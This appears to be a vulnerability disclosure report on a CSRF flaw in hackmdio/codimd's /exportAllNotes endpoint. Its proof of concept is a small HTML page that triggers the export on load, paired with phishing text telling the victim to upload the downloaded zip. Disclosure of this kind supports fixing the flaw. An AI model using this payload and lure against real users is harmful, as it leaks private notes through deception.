Cross-Site Request Forgery (CSRF) in hackmdio/codimd

Valid
Reported on May 23rd 2021

✍️ Description

The /exportAllNotes endpoint does not perform any CSRF token validation. This can be used to force a download of the user's account data from a third-party page, and the downloaded file could then be used to trick the user into handing it over.

🕵️‍♂️ Proof of Concept

  1. Log in to the user account.
  2. Create the following HTML file and open it in the browser.

<html>
<body onload='window.open("https://hackmd.io/exportAllNotes");'>
  To verify that you are a human, upload the zip file that has been downloaded from our website now.
</body>
</html>

  3. This downloads the user's data from CodiMD without the user's consent. An attacker can then trick the user into uploading this file to an attacker-controlled server.

💥 Impact

Potential leakage of private information through phishing, by exploiting the missing CSRF token on /exportAllNotes.